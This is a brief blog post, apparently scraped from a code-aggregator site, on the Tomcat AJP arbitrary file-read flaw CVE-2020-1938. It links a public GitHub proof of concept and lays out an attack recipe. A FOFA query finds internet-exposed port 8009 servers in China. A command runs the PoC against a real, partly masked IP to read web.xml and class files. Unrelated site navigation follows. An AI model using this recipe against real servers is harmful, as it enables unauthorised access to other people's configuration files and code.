Tomcat AJP protocol file contains a vulnerability (CVE-2020-1938)

Others 2020-02-22 15:15:24 views: null

Tomcat AJP protocol Due to implementation defects cause-related parameters controllable, an attacker can exploit the vulnerability by constructing specific parameters, read the server webapps directory any files, but can not cross to the parent directory .

PoC来自GitHub:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

The first step: use FOFA search port 8009

port="8009" && country="CN"

Step 2: Run PoC

python2.7 CNVD-2020-10487-Tomcat-Ajp-lfi.py  151.*.*.114 -p 8009 -f /WEB-INF/web.xml

1. Read web.xml

2. Read * .class file

Guess you like

Origin www.cnblogs.com/dgjnszf/p/12345344.html
Recommended
微软回应中国区AI团队“打包赴美”传闻
Ranking
How to use ChatGPT to write 100,000+ hot articles for public accounts (includes prompt words)
sudo echo command execution Permission denied
ADO: Using Transactions to Operate Oracle Database
[Java] [Class and Object] equals, hashCode, clone methods
Linux virtual host function
Порт управления rabbitmq открыт
on,where
jQuery WeUI
How can there be a weed pilot in Hangzhou?
tcp / ip model four
Daily
More
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)

Code World

© 2018 codetd.com